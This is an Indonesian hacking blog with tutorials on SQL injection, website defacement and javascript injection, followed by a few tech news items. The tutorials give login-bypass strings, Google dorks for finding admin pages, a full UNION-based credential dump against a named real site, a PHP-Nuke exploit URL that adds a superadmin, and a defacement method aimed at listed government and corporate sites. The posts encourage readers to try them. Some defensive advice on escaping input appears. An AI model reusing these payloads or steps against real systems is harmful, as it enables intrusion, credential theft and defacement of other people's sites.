Translate This Blog

English French German Spain Italian Dutch

Russian Portuguese Japanese Korean Arabic Chinese Simplified
by : NUROFIK
Tampilkan postingan dengan label artikel. Tampilkan semua postingan
Tampilkan postingan dengan label artikel. Tampilkan semua postingan

SQL INJECTION 1

Rabu, 25 Mei 2011

Contoh sintaks SQL Injection

Contoh sintak SQL dalam PHP

1. $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2. isikan password dengan string ’ or ’’ = ’
3. hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4. maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL



Contoh sintaks SQL Injection

1. Sintaks SQL string ‘-- setelah nama username
2. Query database awal :
Berubah menjadi :


Contoh sintaks SQL Injection

SQL Injection melalui URL, contohnya :

Penanganan SQL Injection

1. Merubah script php
2. Menggunakan MySQL_escape_string
3. Pemfilteran karakter ‘ dengan memodifikasi php.ini

1. Merubah script php

Contoh script php semula :

$query = "select id,name,email,password,type,block from user " .

"where email = '$Email' and password = '$Password'";

$hasil = mySQL_query($query, $id_mySQL);

while($row = mySQL_fetch_row($hasil))

{

$Id = $row[0];
  $name = $row[1];

$email = $row[2];

$password = $row[3];

$type = $row[4];

$block = $row[5];

}

if(strcmp($block, 'yes') == 0)

{

echo "\n";

exit();

}

else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :
Maka dilakukan perubahan script menjadi :

$query = "select id,name,email,password,type,block from user".

"where email = '$Email'";

$hasil = mySQL_query($query, $id_mySQL);

while($row = mySQL_fetch_row($hasil))

{

$Id = $row[0];

$name = $row[1];

$email = $row[2];

$password = $row[3];

$type = $row[4];

$block = $row[5];

}

if(strcmp($block, 'yes') == 0)

{
echo "\n";

exit();

}

$pass = md5($Password);

else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));

2. Menggunakan MySQL_escape_string

Merubah string yang mengandung karakter ‘ menjadi \’ misal SQL injec’tion menjadi SQL injec\’tion

Contoh : $kar = “SQL injec’tion”;

$filter = mySQL_escape_string($kar);

echo”Hasil filter : $filter”;

Hasilnya :

3. Pemfilteran karakter ‘ dengan memodifikasi php.ini

Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php

Contoh :
Contoh script yang membatasi karakter yang bisa masukkan :

function validatepassword( input )
good_password_chars =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

validatepassword = true
for i = 1 to len( input )

c = mid( input, i, 1 )
if ( InStr( good_password_chars, c ) = 0 ) then
validatepassword = false
exit function
end if
next
end function

Implementasi SQL Injection

1. Masuk ke google atau browse yg lain
2. Masukkan salah satu keyword berikut

"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}

3. Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4. Masukkan kode berikut :

User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)

5. Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6. Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7. Banyak variasi kode yang mungkin, antara lain :

User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :

‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;

“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x

8. Cobalah sampai berhasil hingga anda bisa masuk ke admin panel
READ MORE - SQL INJECTION 1

SQL INJECTION 2

to the point.. talk less do more

target site:

http://www.itmaasia.com/news.php?id=10

udahnya kita test apakah target kita bisa di SQLi ato gk??
caranya cukup kasih tanda ( ' ) / petik satu dibelakang url jadinya

http://www.itmaasia.com/news.php?id=10'

klo keluar tulisan error sql berarti webnya bisa di SQLi.



langkah berikutnya kita cari jumlah kolom. caranya make syntak

order by (jumlah kolom)--

kita terapkan pada site target jadinya

http://www.itmaasia.com/news.php?id=10 order by 300--

kalo ada tulisan :
Unknown column '300' in 'order clause'

itu berarti kolomnya kebanyakan kita pake ilmu ngira" jumlah kolomnya brp? harus pas misal kita kira² target kita punya kolom 26 sehingga

http://www.itmaasia.com/news.php?id=10 order by 26--

error tadi gk keluar.. kita coba lagi make kolom 27

http://www.itmaasia.com/news.php?id=10 order by 27--

dan lagi error gk kluar?? kita coba lagi make kolom 28

http://www.itmaasia.com/news.php?id=10 order by 28--

ternyata error keluar.. jadi kesimpulannya.. target kita tuh pny kolom 27 buah..

setelah kita dapet semua kolom kita urutkan kolom untuk mendapatkan "NOMOR AJAIB" caranya make syntak

depan id kasih tanda ( - )/kurang union select kolom1,2, n

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

maka akan muncul "NOMOR AJAIB" itulah nomor yang kita gunakan untuk inject (oh iya, nomor ajaib ini tidak hanya di badan web, tetapi bisa di title web)

di target kita ngeluarin angka 3 & 11
selanjutnya kita cari versi databasenya.. caranya make syntak

@@Version pada nomor ajaib

penerapan dalam target kita (gw ambil yg 11)

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,@@Version,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

muncul versi database
5.0.51b-community-nt

[quote]
catatan:
database versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya.[/quote]

langkah selanjutnya kita cari informasi table caranya

memasukkan perintah group_concat(table_name) didalam "angka ajaib" kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()--

penerapan dalam target kita

http://www.itmaasia.com
/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.tables%20where%20table_schema=database()--

nah muncul kan nama² tabel nya ada tabel admin tuh

langkah selanjutnya kita akan mengintip informasi di dalam table admin,

pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name='nama table'

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from information_schema.columns where table_name='tb_admin'--

oopppsss... error!
table 'admin' harus diconvert dulu ke hexa agar dapat dibaca oleh SQL..
dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa..

caranya masuk ke web ini
http://www.swingnote.com/tools/texttohex.php

trus di kolom string tulis tb_admin kemudian convert
kemudian copy hexnya. lalu kita terapkan pada target kita

http://www.itmaasia.com
/news.php?id=-10%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from%20information_schema.columns%20where%20table_name=0x74625f61646d696e

keluarkan informasi dari tb_admin..
langkah selanjutnya kita cari id_admin & password caranya

group_concat(username,0x3a,password) tambahkan diakhir URL from admin

dimana 0x3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from admin adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama admin..

penerapan dalam target kita

http://www.itmaasia.com/news.php?id=-10 union select 1,2,3,4,5,6,7,8,9,10,group_concat(username,0x3a,password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from tb_admin

wakakakakkak... dapet dech informasi login admin dan passwordnya..
sekarang kita akan login sebagai admin, namun user admin telah terenkripsi dengan MD5. cari dah cracknya......

selanjutnya terserah anda..

segala akibat ditanggung sendiri"..

Sumber Tecon Indonesia 
READ MORE - SQL INJECTION 2

SQL INJECTION 3

SQL Injection adalah salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server. Pada dasarnya,serangan ini difasilitasi oleh kode program anda sendiri.
teknik nya,penyerang mencoba memasukkan query (melalui field atau URL) yang akan menyebabkan database server men-generate query SQL yang tidak valid.
Pada kenyataan nya,SQL injection terbukti merupakan salah satu teknik terbaik yang sering
melumpuhkan sasarannya. Begitu penyerang berhasil menguasai kendali dataase server,ia bisa
melakukan apa saja,seperti memodifikasi atau bahkan menghapus semua data yang ada. bagaimana pun juga ,
ini bisa dicegah jika kode program anda melakukan validasi yang baik.
Sebenarnya apa bila anda teliti,teknik SQL injection sangat sederhana sekali. Akan tetapi
justru yang sering diabaikan oleh para programer,entah itu tidak tahu atau lupa.

Berikut ini beberapa contoh teknik SQL injection,implementasi,dan cara menggagalkan nya.



Single SQL Injection
walaupun penyerang awalnya mencoba memasukan query berupa pernyataan SQL,akan tetapi bukan
sembarang query. Dalam hal ini,penyerang cukup memiliki pengatahuan mengenai SQL,sebagai
contoh permulaan (maklumlah saya masih newbie ) anda memiliki kode seperti ini.

$match = false;
if (isset($_POST['submit'])) {
$nama = $_POST['nama'];
$pass = $_POST['pass'];
$sql = "SELECT nama, password FROM user WHERE
nama='$nama' AND password='$pass'";
$res = mysqli_query($db, $sql);
// jika res berhasil,dan row yang
// dikembalikan=1, set $match=true
if ($res && mysqli_query_rows($res) == 1) {
$match = true ;
mysqli_free_result($res);
}
if ($match === true) {
echo 'account match';
} else {
echo 'invalid account';
}
}


kode program diatas memang kelihatan melakukan verifikasi data, tetapi sebenarnya sangat
rapuh,penyerang bisa menggnakan query-query seperti dibawah ini,untuk melakukan akses
secara tidak sah
// mengisi field nama saja,# adalah komentar,
// yang akan mengabaikan baris setelahnya
admin'#

// mengisi nama field saja
// mengekstrak data kelokasi tertentu
'OR' 1=1 INTO DUMPFILE '/path/ke_lokasi/file.txt '#
'OR' 1=1 INTO OUTFILE '/path/ke_lokasi/file.txt '#

Bagaimapun juga,contoh contoh SQL injection diatas adalah contoh yang umum. Adapun untuk
mencegah nya menggunakan fungsi mysql_real_escape_string () atau addslashes(), seperti
yang diuraikan pada fungsi myMacig()sebelumnya

$nama = myMacig($_POST['nama']};
$pass = myMacig($_POST['pass']};


Multiple SQL injection
Contoh SQL injection lainnya adalah dengan memberikan multiple query,seperti berikut:
// $id dari method GET/POST
$sql = "SELECT * FROM buku WHERE kode='{$id}’ “;
//mengahapus isi table
0; DELETE FROM user
// membuat account baru
0; GRANT ALL ON *.* TO 'xxx@%'
Dalam kasus ini,macig quote akan mengabaikan tanda titik koma,ini sangat membahayakan 
jika menggunakan SQLite atau postgreSQL. Adapun solusi nya adalah menggunakan operator
casting untuk memastikan bahwa id harus integer.

//Simulasi nilai $_POST['id']
0; DELETE FROM user
$id = (int) myMacig($_POST['id']);

apabila anda ingin memeriksa apakah input mengandung karakter tertentu,gunakan fungsi strpos().

$nama = myMacig ($_POST ['id']);
// periksa apakah karakter ; terdapat
// di variabel $nama.
if (strpos($nama, ';' die ('Naughty Naughty,
Very Naughty...';
READ MORE - SQL INJECTION 3

CARA DEFACE WEB 1

Deface/Defacing atau cyber grafity secara umum diartikan sebagai aktifitas menodai atau
merubah ubah isi suatu halaman web dengan kalimat , image atau link tertentu yang tidak
ada sangkut pautnya dengan misi web tersebut , Biasanya hacker men-deface suatu
halaman web dengan maksud supaya eksistensinya diketahui oleh khalayak ramai.
Mungkin anda pernah dengar atau pernah mengunjungi suatu web yang terkena deface
seperti :

http://www.bandaaceh.go.id
http://www.pertamina.co.id
http://www.transtv.co.id
http://www.setkab.go.id
http://www.pom.go.id
http://www.usni.ac.id



Ternyata apabila kita perhatikan target target tersebut dengan seksama , para target
mempunyai kesamaan yaitu server web tersebut berjalan di Operating System Windows
2000 dan servernya adalah IIS 5.0/6.0.

Mungkin anda beranggapan bahwa deface server server web tersebut adalah hal yang
susah dan perlu waktu yang lama untuk menyusup ke server
tersebut , ternyata hal
tersebut adalah mudah semudah copy dan paste , silahkan ikuti langkah langkah berikut ,
dalam hal ini gw menggunakan contoh penggunaan web folder pada Windows xp


1. Buatlah suatu halaman web seperti dibawah ini atau terserah anda dengan
menggunakan tool/software terserah anda seperti Frontpage , Macromedia , Note
pad dan lain lain

2. Beri nama halaman web tersebut dengan index.html / index.asp / default.html /
default.asp atau nama lain tergantung nama file halaman pertama suatu web
terbuka atau nama terserah anda apabila hanya mau menyimpan file tersebut di
suatu web

3. Buka My computer pada desktop dan lihat icon web folder

4. Klik 2 kali pada icon web folder tersebut

5. klik 2 kali pada icon add web folder

6. Isikan URL target di popup yang muncul misalkan target kita adalah
http://www.pertamina.co.id maka isikan URL tersebut

7. klik next lalu finish
8. Klik 2 kali pada folder yang terbentuk dan anda akan melihat isi folder tersebut
dengan file file yang akan tampil pada halaman web apabila kita mengunjungi
web tersebut

9. rubah nama file pembuka web tersebut (biasanya nama file index.html atau
index.asp) dengan nama file lain seperti index_old.asp atau terserah anda ,
biasakan hal ini anda lakukan karena kita tidak bermaksud untuk merusak isi web
milik orang lain , hanya mengingatkan.

10. Copy dan paste-kan halaman web yang anda buat tadi di folder web folder yang
telah kita buat

11. Save di komputer anda.

12. Proses Deface selesai.

Untuk pembelajaran silahkan anda cari web site yang masih vurn dengan menggunakan
google searching ketikan keyword dengan kunci “allinurl:*.asp” atau apabila mau
mencari situs pemerintah ketikan keyword “web: .go.id”
Untuk para administrator web site , download-lah patch bug tersebut untuk menghindari
terjadinya deface yang sangat mudah ini dengan demikian untuk para defacer yang
hendak coba coba deface dengan cara ini dan prosesnya gagal , sudah dipastikan web siteyang hendak anda deface sudah tidak vurn lagi atau sudah di-patch.
Selamat mencoba.
  
READ MORE - CARA DEFACE WEB 1

CARA DEFACE 3 (Old Deface Situs PHP Nuke)

1.Buka situs www.google.com
2.kemudian msukkan google dork kya gene |=> allinurl:.com/nuke/index.php atau allinurl:.org/nuke/index.php
3.nah klw udh ktemutargetnya lnjut ne. contoh: www.sakaw.com/nuke/index.php
4.yg berwarna merah gnti dengan admin.php
5.jika sudah masukkan bug berikut ne dibelakang situs td:

?op=AddAuthor&add_aid=sakaw32&add_name=
God&add_pwd=anjinkliar&add_email=
skw_swat@yahoo.com@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
misal : www.sakaw.com/nuke/admin.php?
op=AddAuthor&add_aid=sakaw32&add_name=
God&add_pwd=anjinkliar&add_email=
skw_swat@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox


6.kemudian akan muncul www.sakaw.com/nuke/admin.php?op=mod_author pada adress bar
7. kemudian kalian akan di suruh login, masukin id & password kalian tadi.
Masih ingat kan ?
id=sakaw32 => liat yg diatas tadi
password=anjinkliar => liat yg diatas tadi

Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
so, kalian dah masuk ke situs tersebut.. tp klw tdk bsa berarti tu situs dah di path ma adminnya 
READ MORE - CARA DEFACE 3 (Old Deface Situs PHP Nuke)

JAVASCRIPT INJECTION

Javascript injection memeang tidak setenar php injection, namun kadang metode ini dibutuhkan. Pada artikel ini akan dibahas sekilas tentang bagaimana melakukan javascript injection secara sederhana.Untuk melakukan javascript injection lebih mudah bila menggunakan browser opera, karena browser ini memiliki fitur-fitur yang lengkap untuk urusan "begini" =P*
Menampilkan dan menulis sebuah cookieKadang kala sebuah website membuat cookie nya dengan javascript, nah untuk melihat cookie tersebut tanpa memanfaatkan fasilitas browser, kita dapat menggunakan perintah ini di url

javascript:alert(document.cookie);perintah`alert(..)`diatas digunakan untuk menampilkan sebuah popup box yang berisi cookie yang ada pada website tersebut.
sedangkan untuk mengganti cookie tersebut, kita dapat menggunakan perintah javascript:void(document.cookie="...");

*cara seperti diatas dapat juga digunakan untuk mengubah atau menampilkan value yang ada di formco.
menampilkan



javascript:alert(document.contoh.pass.value);

mengubah

javascript:void(document.contoh.pass.value="345");

Jika anda menggunakan browser opera, semua ini dapat dilakukan dengan mudah. Cukup tampilkan source dari web tersebut kemudian tuliskan javascript yang ingin anda jalankan pada sesudah tag lalu pilih apply changes.co.

anda ingin mengganti cookie dari suatu web, tulislah pada tag
document.cookie="qwerty";
anda ingin mengganti value dari field pada suatu form seperti contoh di atas
document.contoh.pass.value="345"
anda ingin mengganti referrer
document.referrer=http://qwerty.net;

Setelah di apply changes, maka website target anda telah dalam keadaan menjalankan javascript yang telah anda masukan tadi.
yup, itu sekilas dasar-dasar dari javascript injection. Jika tertarik lebih jauh anda bisa cari-cari referensi dari uncle google..^^ 
READ MORE - JAVASCRIPT INJECTION

JAVASCRIPT INJECTION 2

Javascript injection adalah suatu teknik yang dapat digunakan untuk mengganti isi suatu situs tanpa meninggalkan situs tersebut. Teknik ini memerlukan pengguna komputer untuk memasukkan kode Javascript pada URL suatu suatu situs (jarang sekali suatu situs membiarkan kita untuk melakukan javascript injection pada comment box, informasi, dll kecuali guestbook).

2 perintah yang biasa digunakan untuk Javascript injection adalah alert() dan void(). Contoh, untuk membuat pop-up window, masukkan kode ini ke URL situs:

javascript:alert(‘hello world’);

Tentu, kita bisa masukkan lebih dari 1 perintah di 1 baris. Selain itu, kita bisa menggunakan perintah alert() untuk memunculkan cookie ataupun variabel apapun yang dipakai di situs itu. Contoh:



javascript:alert(document.cookie); alert(variabel);

Hmm, tapi perintah-perintah tersebut hanyalah memunculkan suatu informasi tentang situs tersebut. Bagaimana kalau kita ingin menggantinya? perintah void() akan digunakan untuk ini. Contoh:

javascript:void(variabel=new value);
Struktur perintah untuk mengganti sebuah elemen dari suatu cookie juga hampir sama.

javascript:void(document.cookie=”Field = myValue”);

Perintah ini bisa digunakan untuk membuat Field baru ataupun untuk mengganti sebuah Field sudah ada. Contoh, kalau kita ingin mengganti administration field,

javascript:void(document.cookie=”Admin=True”);

Diatas itu, perintah void() tidak hanya berlaku untuk sebuah elemen saja, kita bisa juga mengganti sebuah form. Misal, kita mempunyai kode seperti:

1.

2. 

3. 
4.     


8.

Dan kita masukkan kode yang berikut

javascript:void(document.forms[0].elements[1].options[1].value=”Aku”);
Maka, yang dilakukannya adalah mengganti form yang pertama (/login.php), elemen yang kedua (select name=”loginID” ) dan pilihan yang kedua (option value=”Dia”)
Dia menjadi “Aku”. Tentu, jumlah perintah yang bisa kita lakukan dengan javascript injection jauh lebih banyak seperti javascript:document.forms[0].DocTitle.value=’ http://www.websiteApaSaja.com’; atau javascript:void(document.forms[0].action=”http://www.google.com”; dan seterusnya.
READ MORE - JAVASCRIPT INJECTION 2

JAVASCRIPT INJECTION 3

Javascript injection adalah teknik kecil yang bagus yang memungkinkan Anda untuk mengubah sebuah isi situs tanpa benar-benar meninggalkan situs. Ini dapat sangat berguna ketika mengatakan, Anda perlu spoof server dengan mengedit beberapa pilihan bentuk. Contoh akan dijelaskan di seluruh.

Isi:
I. Dasar-dasar Injeksi
II. Mengedit Cookie
III. Formulir Mengedit


I. Dasar-dasar Injeksi

suntikan Javascript dijalankan dari baris URL dari halaman yang Anda kunjungi. Untuk menggunakannya, Anda harus terlebih dahulu completly kosong URL dari URL bar. Itu berarti tidak ada http:// atau apapun.

Javascript dijalankan dari URL bar dengan menggunakan javascript: protokol. Dalam tutorial ini saya hanya akan mengajarkan anda tulang telanjang menggunakan ini, tetapi jika Anda seorang guru Javascript, Anda dapat memperluas javascript ini menggunakan tua polos.

Kedua perintah dibahas dalam tutorial ini adalah tanda (), dan void (); perintah. Ini cukup banyak semua yang Anda akan perlu dalam kebanyakan situasi. Untuk javascript pertama Anda, Anda akan membuat jendela sederhana muncul, pertama pergi ke situs web apapun dan kemudian ketik berikut ke URL bar anda:
Kode:

javascript: alert ('Hello, World');

Anda harus mendapatkan kotak dialog kecil yang mengatakan "Hello, World". Ini akan diubah nanti untuk memiliki kegunaan lebih praktis.

Anda juga dapat memiliki lebih dari satu perintah dijalankan pada waktu yang sama:

Kode:

javascript: alert ('Hello'); alert ('Dunia');

Ini akan muncul kotak yang mengatakan 'Halo' dan dari yang lain yang mengatakan 'Dunia'.

II. Mengedit Cookie

Pertama, periksa untuk melihat apakah situs yang anda kunjungi telah mengatur cookie dengan menggunakan script ini:

Kode:

javascript: alert (document.cookie);

Hal ini akan muncul informasi yang disimpan dalam cookie situs. Untuk mengedit informasi apapun, kami memanfaatkan void ();  
perintah.

Kode:

javascript: void (document.cookie = "Field = myValue");

Perintah ini bisa mengubah informasi yang ada atau membuat nilai yang sama sekali baru. Ganti "Field" dengan baik medan yang ada ditemukan dengan menggunakan alert (document.cookie); perintah, atau memasukkan nilai Anda sendiri. Kemudian ganti "myValue" dengan apapun yang Anda inginkan lapangan menjadi. Sebagai contoh:



Kode:

javascript: void (document.cookie = "Authorized = yes");

Apakah baik membuat lapangan "resmi" atau mengeditnya untuk mengatakan "ya" ... sekarang keduanya, atau tidak ini melakukan sesuatu yang berharga tergantung pada situs yang Anda suntik pada.

Hal ini juga berguna untuk memakukan sebuah (document.cookie) waspada, di akhir baris yang sama untuk melihat apa efek Anda mengubah miliki.

III. Formulir Mengedit

Kadang-kadang, untuk mengedit nilai dikirim ke sebuah website yang diberikan melalui formulir, Anda dapat men-download dan 
edit html yang sedikit untuk memungkinkan Anda untuk mengirimkan apa yang Anda inginkan. Namun, kadang-kadang cek website untuk melihat apakah Anda benar-benar dikirim dari situs web Anda seharusnya. Untuk menyiasati ini, kami hanya bisa mengedit bentuk langsung dari javascript. Catatan: Perubahan ini hanya sementara, jadi tidak tgunakan mencoba merusak sebuah situs melalui suntikan javascript seperti ini.

Setiap bentuk pada halaman Web tertentu (kecuali nama lain) disimpan dalam bentuk [x] array ... dimana "x" adalah nomor, agar dari atas ke bawah, dari semua bentuk dalam suatu halaman. Perhatikan bahwa bentuk mulai dari 0, maka bentuk pertama pada halaman benar-benar akan menjadi 0, dan yang kedua akan menjadi 1 dan seterusnya. Mari kita contoh ini:

Kode:

(form action="http://www.website.com/submit.php" method="post")
(input type="hidden" name="to" value="admin@website.com")

Catatan: Karena ini adalah bentuk pertama pada halaman, itu adalah bentuk [0]

Katakanlah formulir ini digunakan untuk email, mengatakan informasi server penting ke admin dari website. Anda tidak dapat hanya men-download naskah dan mengeditnya karena halaman submit.php mencari seorang referer. Anda dapat memeriksa untuk melihat apa nilai elemen bentuk tertentu telah dengan menggunakan script ini:
Kode:

javascript: alert (document.forms [0] to.value.)

Hal ini mirip dengan (document.cookie) alert; dibahas sebelumnya. Dalam hal ini, itu akan muncul peringatan yang mengatakan "admin@website.com"

Jadi di sini adalah cara Inject email Anda ke dalamnya. Anda dapat menggunakan cukup banyak teknik yang sama dengan mengedit cookies yang ditampilkan sebelumnya:

Kode:

javascript: void (document.forms [0] to.value = "email@nhacks.com".)

Hal ini akan mengubah email formulir ini untuk menjadi "email@nhacks.com". Kemudian Anda bisa menggunakan tanda (); script yang ditampilkan di atas untuk memeriksa pekerjaan Anda. Atau Anda dapat pasangan kedua perintah pada satu baris.
   
READ MORE - JAVASCRIPT INJECTION 3

Polisi Ringkus Lagi Pendukung WikiLeaks di Belanda

Senin, 13 Desember 2010

AMSTERDAM - Polisi di Belanda telah menangkap tersangka kedua yang berhubungan dengan gerakan pendukung WikiLeaks. Para tersangka ini diduga melakukan serangan distribution denial of service (DDoS) untuk membuktikan dukungan mereka terhadap situs whistle-blower ini.

Penahanan pemuda berusia 19 tahun ini mengikuti serangan yang dilakukan Kepolisian Belanda beberapa waktu lalu. Sebelumnya ditangkap pula seorang pemuda berusia 16 tahun yang dituduh terlibat dalam kelompok 'Anonymous' pendukung WikiLeaks yang menyerang beberapa website termasuk Mastercard dan PayPal. Demikian dikutip dari Naked Security, Senin (13/12/2010).

Jaksa penuntut mengklaim bahwa pemuda berusia 19 tahun yang berasal dari Hoogezand-Sappemeer, timur laut Belanda, membanjiri website jaksa tersebut dengan trafik internet.

"Pemuda ini menggunakan software hacker untuk membanjiri internet di kantor jaksa dengan sebanyak mungkin trafik digital. Penyelidikan oleh National Police Services Agency menunjukkan bahwa pemuda tersebut menggunakan nama samaran internet Awinee. Mereka juga membujuk pengguna internet lainnya untuk berpartisipasi dalam serangan tersebut," tambah pihak kepolisian

Akan tetapi serangan DDoS yang digunakan tidak menyembunyikan alamat IP di komputernya. Hal ini ternyata membuat polisi jadi lebih mudah mengidentifikasi lokasi di mana serangan tersebut berasal.

Jadi siapakah 'Awinee'? Berdasarkan pencarian Google pengguna nama samaran tersebut berasal dari seorang bernama Martijn Gonlag. Wikipedia mengatakan bahwa ada 34.000 orang yang tinggal di daerah Hoogezand-Sappemeer, lalu mungkin ada banyak pemuda berusia 19 tahun yang menggunakan nama samaran online yang sama.

Serangan distribution denial of service (DDoS) adalah ilegal di banyak negara, dan di Belanda bisa mendapat hukuman penjara selama enam tahun.

Jaksa penuntut juga mengklaim bahwa pria yang baru ditangkap tersebut juga turut berpartisipasi dalam serangan DDos terhadap situs Moneybookers.com, yang membuat situs tersebut offline selama beberapa waktu. Situs Moneybookers.com menghapus hubungannya dengan WikiLeaks pada bulan Agustus.
via okezone
READ MORE - Polisi Ringkus Lagi Pendukung WikiLeaks di Belanda

Peretas Bobol Data Pelanggan McDonald

WASHINGTON - Restoran makanan siap saji McDonald telah melakukan kerja sama dengan pihak penegak hukum, setelah sebelumnya hacker jahat berhasil masuk ke database perusahaan mereka dan mencuri informasi mengenai jumlah pelanggan.

"Kami telah diberitahukan oleh salah satu partner bisnis kita, Arc Worldwide, bahwa informasi pelanggan terbatas yang terkumpul di situs McDonald, diperoleh oleh pihak ketiga yang tidak berwenang," kata juru bicara McDonald, seperti dikutip melalui PC World, Senin (13/12/2010).

Arc disewa oleh McDonald untuk mengembangkan dan mengkoordinir distribusi pesan email promosi, dan Arc pada gilirannya didasarkan pada sebuah perusahaan e-mail tak dikenal untuk mengelola database informasi pelanggan. sistem ini perusahaan e-mail teman yang menyusup ke.

Data yang pelanggan diambil secara sukarela, menurut pihak McDonald, tidak termasuk nomor jaminan sosial, nomor kartu kredit, atau informasi keuangan yang sensitif.

"Sebaliknya, informasi terbatas mencakup apa yang diperlukan untuk mengkonfirmasi seperti usia pelanggan, metode untuk menghubungi pelanggan, preferensi dan informasi umum lainnya," tambah juru bicara.

Ini berarti bahwa data pelanggan akan meliputi nama lengkap, nomor telepon, alamat pos dan alamat email. Juru bicara tidak mengatakan informasi apa yang diperlukan untuk konfirmasi usia, sehingga tidak jelas apakah pelanggan hanya memeriksa orang dewasa.

Selain bekerja sama dengan lembaga penegak hukum, McDonald's adalah menyelidiki kerusakan keamanan di perusahaan yang disewa oleh Arc, yang merupakan divisi layanan pemasaran biro iklan Leo Burnett. spesialisasi Arc meliputi komunikasi digital, pemasaran langsung, promosi dan pemasaran pembelanja.
via okezone
READ MORE - Peretas Bobol Data Pelanggan McDonald

OS Google Chrome 'Dilepas' 7 Desember 2010

Jumat, 10 Desember 2010

SAN FRANSISCO - Google dikabarkan akan meluncurkan sistem operasi Google Chrome pada esok hari, 7 Desember 2010. Sebelumnya Google memang menyatakan bahwa Chrome OS akan dilepas pada akhir tahun, ketika perusahaan akan memperkenalkan ke komputer netbook yang berjalan di Chrome OS akhir tahun ini.

Endgadget, Senin (6/12/2010) mengungkapkan laporan mengenai rencana peluncuran OS yang digadang-gadang akan menguasai perangkat seperti Netbook tersebut.

"Beberapa sumber telah mengatakan kepada kami bahwa Google akan mengadakan semacam acara pada Selasa, 7 Desember, namun kita tidak yakin apakah itu akan menjadi acara live, webcast, atau sesuatu yang lain sama sekali dan yang heboh akan melihat peluncuran dari netbook bermerek OS Google-Chrome," tulis Endgadget.

Sementara itu, tim Public Relation Google belum mau berkomentar mengenai kabar tersebut. Namun, Google telah mengirim sejumlah undangan ke media untuk sebuah even peluncuran di hari Selasa 7 Desember 2010 tersebut.

Google diketahui memiliki harapan tinggi untuk Chrome, dan sebagai perusahaan yang mengandalkan terlalu banyak iklan pencarian sebagai pendapatan, OS Chrome akan menjadi salah satu bisnis baru Google dengan potensi yang sangat besar. Dengan Chrome OS, Google sekali lagi melangkah ke dalam wilayah rivalnya seperti, Microsoft dan Apple, yang keduanya membuat sistem operasi serta banyak digunakan perangkat lunak desktop seperti Microsoft Office, Apple iPhoto serta iTunes.
via okezone
READ MORE - OS Google Chrome 'Dilepas' 7 Desember 2010

Pria 23 Tahun Jadi Raja Spam Dunia

Sabtu, 04 Desember 2010


Seorang warga Rusia berusia 23 tahun akan hadir di hadapan pengadilan federal Amerika di Milwaukee, Wisconsin, hari ini untuk menghadapi tuduhan mengoperasikan jaringan spam komputer besar-besaran.
FBI menangkap Oleg Nikolaenko bulan lalu di Las Vegas, Nevada. Petugas federal menuduhnya bertanggung-jawab atas sepertiga email spam dunia.
Mereka mengatakan Nikolaenko menghasilkan jutaan dolar dengan menggunakan komputer yang terinfeksi untuk mengirim milyaran email sampah (spam) yang mengiklankan barang-barang seperti jam-tangan palsu Rolex dan obat palsu perangsang birahi bagi pria.
FBI menambahkan bahwa para pemilik komputer umumnya tidak meyadari bahwa komputer mereka telah terinfeksi, yang tanpa sepengetahuan mereka mengirimkan email spam secara otomatis.
